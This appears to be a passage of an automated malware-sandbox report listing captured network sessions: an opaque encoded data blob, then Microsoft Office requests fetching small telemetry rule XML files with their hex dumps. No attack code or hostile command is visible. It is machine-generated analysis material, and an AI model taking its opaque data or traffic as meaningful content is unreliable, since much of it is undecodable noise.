                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC333INData Raw: 31 64 37 66 0d 0a 32 69 57 4a 66 4c 52 4c 67 50 4c 6a 73 49 6d 70 6a 79 6b 34 67 62 59 72 75 36 34 64 78 33 4a 59 66 56 75 65 77 6f 4c 4f 2b 72 65 68 42 2f 39 65 6a 6e 2b 73 30 4a 44 56 71 35 50 37 57 30 33 6b 6d 67 6e 61 79 6a 2f 39 46 44 6b 52 4b 50 76 75 6f 4c 69 58 6c 65 42 44 36 42 44 48 4c 71 7a 51 68 73 69 72 6b 39 52 53 47 75 54 59 43 59 47 4d 65 4b 30 51 4f 52 45 35 2f 36 6e 74 76 70 62 55 73 6b 6e 75 46 4e 45 6f 35 4a 4f 50 33 65 7a 4d 36 6b 68 53 37 39 39 47 30 38 4d 2f 36 31 41 39 42 33 6d 6b 34 4d 2b 72 6a 74 61 58 52 50 6f 58 6c 6a 61 73 69 63 48 56 35 34 75 31 43 31 6e 6b 31 45 66 64 79 6e 61 76 47 6a 41 5a 4f 50 71 6f 38 71 65 63 33 37 4a 48 37 52 58 62 49 66 43 65 68 64 72 6e 79 75 42 49 47 71 32 55 54 73 47 4d 4a 2b 56 44 43 42 77 6f 37
                                                                                                                                                                                                                                                              Data Ascii: 1d7f2iWJfLRLgPLjsImpjyk4gbYru64dx3JYfVuewoLO+rehB/9ejn+s0JDVq5P7W03kmgnayj/9FDkRKPvuoLiXleBD6BDHLqzQhsirk9RSGuTYCYGMeK0QORE5/6ntvpbUsknuFNEo5JOP3ezM6khS799G08M/61A9B3mk4M+rjtaXRPoXljasicHV54u1C1nk1EfdynavGjAZOPqo8qec37JH7RXbIfCehdrnyuBIGq2UTsGMJ+VDCBwo7
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 78 48 53 74 66 4a 72 4b 35 6f 4b 75 55 6c 65 41 48 37 52 44 58 4a 4f 4b 43 69 64 6e 67 7a 76 39 41 55 2b 37 5a 53 64 54 47 63 4b 59 51 50 52 55 7a 38 36 72 6b 6f 5a 58 54 75 45 65 72 55 4a 59 75 2b 74 44 5a 6b 73 6a 4f 2f 55 78 57 39 5a 5a 7a 6d 64 4d 78 76 46 41 39 45 33 6d 6b 34 4f 69 70 6d 39 61 7a 53 4f 67 57 33 54 76 69 67 6f 66 66 37 74 6e 72 54 6c 54 70 31 31 76 54 77 6e 6d 6d 47 54 45 57 50 50 75 6b 6f 4f 4c 59 30 71 41 48 73 31 37 33 4a 4f 6d 63 69 38 58 72 69 2f 49 46 51 36 50 54 52 5a 6d 55 50 36 45 52 50 68 34 39 38 71 37 6b 6f 4a 37 62 74 55 6a 74 46 4e 59 75 36 4a 69 4a 30 2b 62 41 34 6b 74 66 37 74 42 50 31 63 31 36 35 56 35 36 47 43 47 38 2b 4b 43 43 6e 39 61 71 42 64 34 64 32 43 66 6c 68 73 48 4e 70 64 4b 74 54 46 61 6a 6a 41 6e 58 79 58
                                                                                                                                                                                                                                                              Data Ascii: xHStfJrK5oKuUleAH7RDXJOKCidngzv9AU+7ZSdTGcKYQPRUz86rkoZXTuEerUJYu+tDZksjO/UxW9ZZzmdMxvFA9E3mk4Oipm9azSOgW3Tvigoff7tnrTlTp11vTwnmmGTEWPPukoOLY0qAHs173JOmci8Xri/IFQ6PTRZmUP6ERPh498q7koJ7btUjtFNYu6JiJ0+bA4ktf7tBP1c165V56GCG8+KCCn9aqBd4d2CflhsHNpdKtTFajjAnXyX
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 42 33 6d 6b 34 4e 53 72 6c 4e 69 33 42 64 34 64 32 43 66 6c 68 73 48 4e 70 64 4b 74 54 46 61 6a 6a 41 6e 56 78 58 2b 75 47 6a 34 66 50 76 47 6c 34 36 75 62 32 4c 39 4e 35 52 6e 53 4a 65 75 64 68 39 4c 73 7a 2b 68 5a 58 2b 72 59 52 5a 6d 43 50 36 49 49 65 6b 64 35 30 36 66 32 72 37 66 57 71 55 36 72 41 5a 67 77 6f 70 65 4e 6b 72 4f 4c 36 6b 35 53 36 4e 4a 42 32 64 35 36 71 78 73 37 46 54 2f 39 72 65 79 71 6d 4e 53 34 51 65 63 65 30 53 37 77 67 6f 54 55 2b 63 47 74 42 52 72 6b 7a 41 6d 42 6a 45 6d 31 42 79 73 4a 65 38 6d 6a 37 71 4b 66 77 2f 68 59 70 51 65 57 4c 75 37 51 32 5a 4c 67 79 2b 46 4d 55 75 58 51 51 64 62 44 64 72 63 52 4e 68 45 72 2b 36 44 70 6f 70 66 5a 73 55 72 73 45 39 30 6a 37 35 53 47 30 36 75 46 72 55 78 43 6f 34 77 4a 37 39 78 79 71 54 34
                                                                                                                                                                                                                                                              Data Ascii: B3mk4NSrlNi3Bd4d2CflhsHNpdKtTFajjAnVxX+uGj4fPvGl46ub2L9N5RnSJeudh9Lsz+hZX+rYRZmCP6IIekd506f2r7fWqU6rAZgwopeNkrOL6k5S6NJB2d56qxs7FT/9reyqmNS4Qece0S7wgoTU+cGtBRrkzAmBjEm1BysJe8mj7qKfw/hYpQeWLu7Q2ZLgy+FMUuXQQdbDdrcRNhEr+6DpopfZsUrsE90j75SG06uFrUxCo4wJ79xyqT4
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 4b 37 6e 71 5a 48 64 73 46 58 71 47 74 34 6f 37 4a 2b 41 31 75 37 4f 36 55 78 65 35 64 73 4a 6c 34 78 34 76 56 42 69 58 78 62 62 6c 61 4b 4e 6f 70 57 6e 43 66 4a 65 30 53 57 69 79 4d 48 65 36 4d 66 6c 52 46 7a 71 32 45 50 51 78 33 4f 75 46 44 59 57 50 50 71 68 35 61 6d 5a 30 62 52 4e 37 52 33 56 4a 75 32 66 69 5a 4b 6c 69 2b 70 54 47 72 75 55 62 4d 37 48 63 61 4e 51 4a 56 45 67 76 4b 66 73 37 4d 43 56 74 45 37 74 47 4e 4d 6c 34 35 61 4a 31 2b 50 50 37 45 31 63 34 4e 74 4e 33 4d 31 77 6f 52 77 30 46 54 6a 39 72 4f 75 6a 6b 39 44 34 43 61 73 5a 7a 6d 6d 36 30 4c 44 52 2f 64 7a 39 52 78 72 38 6d 6c 43 5a 79 33 50 6c 53 48 6f 65 4b 2f 61 71 37 71 6d 58 30 4c 74 49 37 42 50 51 4a 65 69 5a 69 64 54 6b 77 76 39 49 56 75 33 54 52 39 58 43 63 71 38 54 4e 31 39 33
                                                                                                                                                                                                                                                              Data Ascii: K7nqZHdsFXqGt4o7J+A1u7O6Uxe5dsJl4x4vVBiXxbblaKNopWnCfJe0SWiyMHe6MflRFzq2EPQx3OuFDYWPPqh5amZ0bRN7R3VJu2fiZKli+pTGruUbM7HcaNQJVEgvKfs7MCVtE7tGNMl45aJ1+PP7E1c4NtN3M1woRw0FTj9rOujk9D4CasZzmm60LDR/dz9Rxr8mlCZy3PlSHoeK/aq7qmX0LtI7BPQJeiZidTkwv9IVu3TR9XCcq8TN193
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 75 66 33 72 42 4d 35 42 6a 45 4a 65 79 43 68 4d 44 35 69 36 4d 4c 58 66 75 55 45 5a 6e 36 65 4c 55 41 4f 56 30 49 36 71 50 32 70 35 58 5a 2b 46 69 6c 42 35 59 75 37 74 44 5a 6b 75 33 45 35 45 68 56 34 74 31 46 31 4d 6c 32 6f 42 45 38 47 7a 50 32 6f 4f 61 71 6d 64 43 79 52 4f 6f 55 33 79 37 71 6c 34 4c 41 71 34 57 74 54 45 4b 6a 6a 41 6e 77 79 32 32 72 41 48 6f 41 64 2b 58 67 35 36 44 59 6a 66 68 44 34 52 48 53 4c 75 36 57 68 4e 54 6d 79 75 4a 4b 57 75 7a 51 51 74 44 4b 66 71 67 56 4e 78 73 72 39 71 76 76 6f 4a 48 5a 74 51 65 6c 58 74 45 78 6f 73 6a 42 34 2b 62 46 34 30 78 4d 6f 38 73 48 77 49 78 34 71 56 42 69 58 7a 6a 77 72 2b 4f 6a 6d 39 61 35 54 66 6b 4d 32 69 44 71 6c 59 33 5a 35 63 33 2f 54 56 58 71 31 30 72 51 79 33 65 70 47 6a 6b 59 65 62 4c 67 35
                                                                                                                                                                                                                                                              Data Ascii: uf3rBM5BjEJeyChMD5i6MLXfuUEZn6eLUAOV0I6qP2p5XZ+FilB5Yu7tDZku3E5EhV4t1F1Ml2oBE8GzP2oOaqmdCyROoU3y7ql4LAq4WtTEKjjAnwy22rAHoAd+Xg56DYjfhD4RHSLu6WhNTmyuJKWuzQQtDKfqgVNxsr9qvvoJHZtQelXtExosjB4+bF40xMo8sHwIx4qVBiXzjwr+Ojm9a5TfkM2iDqlY3Z5c3/TVXq10rQy3epGjkYebLg5
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 2f 57 4b 55 48 6c 69 37 75 30 4e 6d 53 37 63 4c 72 54 46 7a 74 78 6b 7a 66 77 33 43 73 47 54 34 58 4f 76 79 6b 35 4b 75 64 31 72 52 4d 37 42 33 5a 4c 65 75 65 69 4e 32 72 68 61 31 4d 51 71 4f 4d 43 66 6a 58 66 4b 6b 64 65 67 42 33 35 65 44 6e 6f 4e 69 4e 2b 45 76 6c 47 39 59 6a 35 4a 53 45 31 4f 48 4f 37 55 42 5a 37 4e 42 50 33 63 4e 2f 72 68 6b 37 47 54 7a 32 71 2b 61 68 6d 39 4f 2b 42 36 56 65 30 54 47 69 79 4d 48 79 38 4d 62 68 54 42 72 38 6d 6c 43 5a 79 33 50 6c 53 48 6f 55 4e 66 69 6e 34 4b 47 62 33 62 31 44 34 52 76 57 49 66 43 59 67 64 58 35 32 65 31 43 58 2b 2f 58 53 64 33 4b 64 71 4d 54 50 6c 39 33 76 4b 66 34 37 4d 43 56 6c 55 76 73 4e 39 45 79 6f 6f 2f 50 79 36 76 4d 34 51 73 43 6f 39 56 43 30 38 4e 79 70 68 59 35 46 44 7a 32 6f 65 65 6b 6c 63
                                                                                                                                                                                                                                                              Data Ascii: /WKUHli7u0NmS7cLrTFztxkzfw3CsGT4XOvyk5Kud1rRM7B3ZLeueiN2rha1MQqOMCfjXfKkdegB35eDnoNiN+EvlG9Yj5JSE1OHO7UBZ7NBP3cN/rhk7GTz2q+ahm9O+B6Ve0TGiyMHy8MbhTBr8mlCZy3PlSHoUNfin4KGb3b1D4RvWIfCYgdX52e1CX+/XSd3KdqMTPl93vKf47MCVlUvsN9Eyoo/Py6vM4QsCo9VC08NyphY5FDz2oeeklc
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC381INData Raw: 55 4a 59 37 6f 73 6a 42 6c 65 6a 5a 2f 30 31 5a 39 64 63 4f 35 2f 4a 59 73 78 6f 39 44 7a 37 72 72 36 44 69 32 4e 72 34 48 39 4a 65 33 79 37 35 67 5a 66 66 2b 38 79 74 64 42 53 6a 7a 41 6d 42 6a 45 71 6d 48 6a 51 59 4c 2b 33 74 78 37 71 53 30 71 68 41 2f 42 47 57 5a 36 4b 57 77 59 71 34 68 61 31 50 53 36 4f 4d 47 59 75 58 4b 76 5a 48 61 6b 30 6d 73 72 6d 67 75 74 69 4e 36 67 6d 72 44 4a 5a 78 6f 74 65 43 77 50 6e 4e 37 6c 31 5a 70 4f 70 33 2f 74 5a 79 6f 77 63 72 49 51 66 37 75 75 32 71 6a 38 54 30 55 75 67 51 32 43 37 30 30 4d 2b 53 35 49 75 31 63 68 71 72 6c 48 61 58 6a 47 66 6c 53 48 6f 71 4f 76 4b 75 35 37 71 4a 6d 4a 39 64 35 68 6a 42 4f 4b 4c 65 77 64 53 72 6b 37 30 46 47 75 66 46 43 59 47 63 4c 66 35 46 61 55 68 70 72 72 2b 75 74 64 6a 44 2b 42 2b
                                                                                                                                                                                                                                                              Data Ascii: UJY7osjBlejZ/01Z9dcO5/JYsxo9Dz7rr6Di2Nr4H9Je3y75gZff+8ytdBSjzAmBjEqmHjQYL+3tx7qS0qhA/BGWZ6KWwYq4ha1PS6OMGYuXKvZHak0msrmgutiN6gmrDJZxoteCwPnN7l1ZpOp3/tZyowcrIQf7uu2qj8T0UugQ2C700M+S5Iu1chqrlHaXjGflSHoqOvKu57qJmJ9d5hjBOKLewdSrk70FGufFCYGcLf5FaUhprr+utdjD+B+
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 32 36 65 64 0d 0a 48 39 67 66 35 58 6f 35 70 70 5a 4f 54 77 4f 33 49 2b 30 67 64 33 65 70 4b 7a 38 46 77 72 68 45 45 49 52 66 78 6f 65 4f 69 32 75 53 75 53 76 73 64 30 79 37 63 72 6f 2f 56 2f 38 7a 6a 54 56 71 6a 6d 67 6e 57 6a 43 65 63 55 48 4a 66 42 72 4c 67 2b 4f 7a 41 6c 59 31 45 35 52 44 52 50 2f 50 64 6f 73 54 6d 78 4f 5a 4b 47 71 32 55 54 35 6d 55 4c 2b 74 51 50 67 35 35 70 50 43 79 39 38 32 47 37 78 65 35 41 5a 67 77 6f 6f 62 42 69 72 6d 46 72 56 6b 61 75 35 51 4f 31 38 46 2b 70 68 34 35 44 53 76 36 6f 2f 61 76 33 2b 75 47 5a 75 59 56 32 69 54 74 6d 37 2f 73 79 73 62 6d 52 31 66 73 33 33 66 6e 32 58 79 72 48 6a 30 4a 4b 4c 7a 75 6f 4b 50 59 6a 59 45 48 6f 31 37 70 5a 36 4b 49 77 59 71 72 2f 75 35 46 56 4f 54 43 57 4a 54 74 63 71 34 63 4e 78 41 79
                                                                                                                                                                                                                                                              Data Ascii: 26edH9gf5Xo5ppZOTwO3I+0gd3epKz8FwrhEEIRfxoeOi2uSuSvsd0y7cro/V/8zjTVqjmgnWjCecUHJfBrLg+OzAlY1E5RDRP/PdosTmxOZKGq2UT5mUL+tQPg55pPCy982G7xe5AZgwoobBirmFrVkau5QO18F+ph45DSv6o/av3+uGZuYV2iTtm7/sysbmR1fs33fn2XyrHj0JKLzuoKPYjYEHo17pZ6KIwYqr/u5FVOTCWJTtcq4cNxAy
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC1369INData Raw: 36 65 31 71 35 45 72 43 44 6f 44 50 57 54 6b 64 54 6f 39 64 4e 67 56 75 58 54 55 39 37 4b 57 59 56 51 64 46 38 32 76 50 6a 5a 37 4e 43 56 68 77 6d 72 42 70 5a 78 6f 71 57 43 33 4f 58 4d 2b 31 6f 58 78 73 4e 4b 79 63 70 38 35 56 35 36 47 58 6d 6b 38 4b 37 73 6e 4d 54 34 48 37 74 4d 6a 58 79 78 78 39 47 41 39 49 58 30 43 30 79 6a 6a 42 75 58 6a 47 33 6c 53 48 70 59 4f 75 36 79 35 71 2b 4f 31 76 39 35 31 54 6a 56 4f 4f 69 78 6a 4d 4c 73 39 64 4e 65 57 65 33 61 54 73 2f 64 50 2b 74 51 4e 56 39 68 78 65 43 6f 34 4a 37 57 72 67 66 55 55 4a 59 78 6f 73 6a 42 35 2b 6a 46 34 30 78 4d 38 70 6c 76 32 74 31 31 68 42 30 71 47 48 6d 79 34 4f 62 73 77 49 62 32 42 2b 38 50 6c 6e 47 79 77 74 71 48 75 4a 79 39 47 55 57 74 7a 51 6e 50 6a 43 66 33 58 6e 6f 4e 65 61 54 67 70
                                                                                                                                                                                                                                                              Data Ascii: 6e1q5ErCDoDPWTkdTo9dNgVuXTU97KWYVQdF82vPjZ7NCVhwmrBpZxoqWC3OXM+1oXxsNKycp85V56GXmk8K7snMT4H7tMjXyxx9GA9IX0C0yjjBuXjG3lSHpYOu6y5q+O1v951TjVOOixjMLs9dNeWe3aTs/dP+tQNV9hxeCo4J7WrgfUUJYxosjB5+jF40xM8plv2t11hB0qGHmy4ObswIb2B+8PlnGywtqHuJy9GUWtzQnPjCf3XnoNeaTgp


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              17192.168.2.104972513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:29 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                              x-ms-request-id: 352bf644-b01e-005c-8062-404c66000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153130Z-174f7845968xlwnmhC1EWR0sv80000000wz000000000b1fp
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              18192.168.2.104972713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:29 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                              x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153130Z-174f7845968kvnqxhC1EWRmf3g0000000fwg00000000g27r
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              19192.168.2.104972813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:29 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                              x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153130Z-174f7845968n2hr8hC1EWR9cag0000000wtg000000009gu9
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              20192.168.2.104971913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                              x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153130Z-174f7845968ljs8phC1EWRe6en0000000wvg00000000pn01
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              21192.168.2.104972613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:30 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
